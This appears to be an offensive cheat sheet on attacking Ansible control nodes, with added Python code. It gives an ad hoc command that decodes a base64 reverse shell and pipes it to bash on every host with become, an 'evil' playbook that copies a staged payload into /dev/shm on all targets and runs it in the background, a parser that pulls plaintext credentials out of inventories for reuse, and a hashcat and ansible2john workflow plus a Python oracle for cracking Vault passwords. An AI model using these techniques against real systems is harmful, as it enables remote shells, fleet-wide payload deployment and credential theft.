$ cat /etc/passwd | grep ans         # is there an ansible service user on this box?
$ cat /etc/ansible/hosts             # default inventory; ansible.cfg [defaults] inventory= or ANSIBLE_INVENTORY may point elsewhere
$ ansible --version                  # also prints which ansible.cfg is in use
$ ansible <GROUP_NAME> -m shell -a "echo <BASE64_REVERSE_SHELL>|base64 -d|/bin/bash" --become   # GROUP_NAME is any inventory group, host pattern or "all"
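The inventory is what tells you which group name to put in the command above, and on a control node it is also the first place plaintext credentials show up. The following is an added example, not code from the original page: it parses an INI-style inventory of the kind found at /etc/ansible/hosts, expands groups through their :children, and flags the real Ansible connection variables that carry a secret or point at key material. The sample inventory is constructed for the demo; host patterns such as web[1:3] are not expanded.

```python
# Added example, not from the original page: parse an INI-style Ansible inventory
# (the kind found at /etc/ansible/hosts), list what you could pass as <GROUP_NAME>,
# and flag connection variables that carry credentials. Stdlib only. The sample
# inventory is constructed for the demo; host patterns like web[1:3] are not expanded.
import re

# Real Ansible connection variables that hold a secret or point at key material.
SECRET_VARS = {
    "ansible_password", "ansible_ssh_pass",
    "ansible_become_password", "ansible_become_pass",
    "ansible_ssh_private_key_file", "ansible_private_key_file",
}

SAMPLE_INVENTORY = """\
# constructed sample inventory
[web]
web1 ansible_host=10.0.0.5 ansible_user=deploy ansible_password=Sup3rS3cret!
web2 ansible_host=10.0.0.6

[db]
db1 ansible_host=10.0.0.9 ansible_ssh_private_key_file=/home/ansible/.ssh/id_ed25519

[prod:children]
web
db

[prod:vars]
ansible_become_password=r00tme
"""

SECTION_RE = re.compile(r"\[([^\]:]+)(?::(children|vars))?\]")


def parse_ini_inventory(text):
    """Return (hosts, children, group_vars):
    hosts      {group: {hostname: {var: value}}}
    children   {group: [child_group, ...]}
    group_vars {group: {var: value}}"""
    hosts, children, group_vars = {}, {}, {}
    section, kind = "ungrouped", "hosts"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank or comment line
            continue
        m = SECTION_RE.fullmatch(line)
        if m:
            section, kind = m.group(1), m.group(2) or "hosts"
            continue
        if kind == "hosts":
            name, *pairs = line.split()
            hosts.setdefault(section, {})[name] = dict(
                p.split("=", 1) for p in pairs if "=" in p)
        elif kind == "children":
            children.setdefault(section, []).append(line)
        else:
            key, _, value = line.partition("=")
            group_vars.setdefault(section, {})[key.strip()] = value.strip()
    return hosts, children, group_vars


def expand_group(group, hosts, children, _seen=None):
    """All hosts a pattern like `ansible prod` would hit, following :children."""
    _seen = _seen or set()
    if group in _seen:          # guard against cyclic children definitions
        return {}
    _seen.add(group)
    out = dict(hosts.get(group, {}))
    for child in children.get(group, []):
        out.update(expand_group(child, hosts, children, _seen))
    return out


def find_secrets(hosts, group_vars):
    """[(scope, var, value)] for every credential-bearing variable in the inventory."""
    found = []
    for group_hosts in hosts.values():
        for host, hvars in group_hosts.items():
            found += [(host, k, v) for k, v in hvars.items() if k in SECRET_VARS]
    for group, gvars in group_vars.items():
        found += [("[%s:vars]" % group, k, v) for k, v in gvars.items() if k in SECRET_VARS]
    return found


if __name__ == "__main__":
    hosts, children, group_vars = parse_ini_inventory(SAMPLE_INVENTORY)
    for group in sorted(set(hosts) | set(children)):
        print(group, "->", sorted(expand_group(group, hosts, children)))
    for scope, var, value in find_secrets(hosts, group_vars):
        print("CRED", scope, var, value)
```

Point it at the real file (read /etc/ansible/hosts into parse_ini_inventory) and every hit from find_secrets is a credential you can reuse directly, without touching the vault at all; group_vars/ and host_vars/ directories next to the inventory deserve the same look.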
# ansible-playbook evil.yml
- name: Evil playbook
  hosts: all
  gather_facts: true
  tasks:
    - name: upload
      copy:
        src: /tmp/met            # payload staged on the control node
        dest: /dev/shm/met       # tmpfs on every target, nothing written to disk
        mode: a+x
    - name: execute
      shell: "nohup /dev/shm/met &"
      async: 10                  # fire and forget: the play returns instead of waiting on the payload
      poll: 0
# add "become: true" at play level if the payload needs root on the targets
When vault-encrypted creds are discovered, first check whether the password is already on the box (ansible.cfg [defaults] vault_password_file, or the ANSIBLE_VAULT_PASSWORD_FILE env var); if not, the vault password can be cracked offline with hashcat (mode 16900, Ansible Vault). A vault body looks like this; it is hex, wrapped at 80 columns, and the zeros/ffff lines below stand in for the real bytes:
$ cat vuln.yaml
$ANSIBLE_VAULT;1.1;AES256
00000000000000000000000000000000000000000000000000000000000000000000000000000000
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
00000000000000000000000000000000000000000000000000000000000000000000000000000000
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
00000000000000000000000000000000000000000000000000000000000000000000
Extract the hash with ansible2john and crack it. The file handed to ansible2john must start with the $ANSIBLE_VAULT header line, so an inline "!vault |" value inside a larger YAML file has to be copied out into its own file first. ansible2john prefixes each hash with the file name, so either strip that field (cut -d: -f2) or run hashcat with --username:
$ /usr/share/john/ansible2john.py vuln.yaml > vault.in
$ hashcat -m 16900 -O -a 0 -w 3 --session=vault -o vault.out vault.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
With the recovered password, decrypt the vault (ansible-vault prompts for the password; with the ciphertext on stdin the plaintext goes to stdout):
$ cat vuln.yaml | ansible-vault decrypt
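What ansible2john and hashcat -m 16900 actually do with that blob is worth seeing once, because it explains why cracking needs no AES at all. The following is an added example, not code from the original page or from Ansible: it splits a Vault 1.1/1.2 AES256 body into salt, HMAC tag and ciphertext, prints the $ansible$ hash line (field order as ansible2john emits it, minus its leading "filename:" prefix; compare with your copy's output before feeding hashcat), and verifies candidate passwords offline by re-deriving the HMAC key with the Vault KDF (PBKDF2-HMAC-SHA256, 10000 iterations, 80-byte output: AES key, HMAC key, CTR IV). SAMPLE_VAULT is constructed in the script with a known password and dummy ciphertext; only its HMAC is genuine, which is all a password check looks at.

```python
# Added example, not from the original page: the work hashcat -m 16900 / ansible2john
# do, in stdlib Python. It splits an Ansible Vault 1.1/1.2 AES256 body into salt,
# HMAC and ciphertext, prints the $ansible$ hash line, and tests candidate passwords
# offline by re-deriving the HMAC key with the Vault KDF (PBKDF2-HMAC-SHA256, 10000
# iterations, 80-byte output). No AES is needed to check a password, only to decrypt.
# SAMPLE_VAULT is constructed here with a known password and dummy ciphertext.
import binascii
import hashlib
import hmac

KDF_ITERATIONS = 10000   # Ansible Vault constant


def derive_keys(password, salt):
    """PBKDF2-HMAC-SHA256 -> 32-byte AES-256 key, 32-byte HMAC key, 16-byte CTR IV."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS, dklen=80)
    return dk[:32], dk[32:64], dk[64:80]


def parse_vault(text):
    """Return (salt, hmac_tag, ciphertext) from a vault body.
    Body = header line + hex( salt_hex + '\\n' + hmac_hex + '\\n' + ciphertext_hex ),
    wrapped at 80 columns; indentation (inline `!vault |` values) is tolerated."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    header = lines[0].split(";")
    if header[0] != "$ANSIBLE_VAULT" or len(header) < 3 or header[2] != "AES256":
        raise ValueError("not an Ansible Vault AES256 body: %r" % lines[0])
    inner = binascii.unhexlify("".join(lines[1:]))
    salt_hex, hmac_hex, ct_hex = inner.split(b"\n", 2)
    return (binascii.unhexlify(salt_hex), binascii.unhexlify(hmac_hex),
            binascii.unhexlify(ct_hex))


def to_hashcat(text):
    """$ansible$0*0*<salt>*<ciphertext>*<hmac>, the field order ansible2john emits
    (without its leading "filename:" prefix)."""
    salt, tag, ct = parse_vault(text)
    return "$ansible$0*0*%s*%s*%s" % (salt.hex(), ct.hex(), tag.hex())


def check_password(text, password):
    """True if the candidate reproduces the stored HMAC-SHA256 over the ciphertext.
    This is the whole cracking oracle: one PBKDF2 + one HMAC per guess, no AES."""
    salt, tag, ct = parse_vault(text)
    _, hmac_key, _ = derive_keys(password, salt)
    calc = hmac.new(hmac_key, ct, hashlib.sha256).digest()
    return hmac.compare_digest(calc, tag)


def crack(text, wordlist):
    """First password in wordlist that verifies, or None."""
    for candidate in wordlist:
        if check_password(text, candidate):
            return candidate
    return None


def make_sample_vault(password, ciphertext, salt):
    """Constructed sample: real vault framing around dummy ciphertext. Only the
    HMAC has to be genuine for password checks to behave like the real thing."""
    _, hmac_key, _ = derive_keys(password, salt)
    tag = hmac.new(hmac_key, ciphertext, hashlib.sha256).hexdigest()
    inner = b"\n".join([salt.hex().encode(), tag.encode(), ciphertext.hex().encode()])
    body = inner.hex()
    wrapped = "\n".join(body[i:i + 80] for i in range(0, len(body), 80))
    return "$ANSIBLE_VAULT;1.1;AES256\n" + wrapped + "\n"


SAMPLE_VAULT = make_sample_vault("ansible", bytes(range(48)), bytes.fromhex("a1" * 32))

if __name__ == "__main__":
    print(SAMPLE_VAULT)
    print(to_hashcat(SAMPLE_VAULT))
    print("cracked:", crack(SAMPLE_VAULT, ["password", "Ansible2024", "ansible"]))
```

The cost per guess is the 10000-iteration PBKDF2, which is why a GPU run with a rule set is the practical route for anything but a tiny wordlist; the verifier above is for understanding the format and sanity-checking a cracked password before handing it to ansible-vault decrypt.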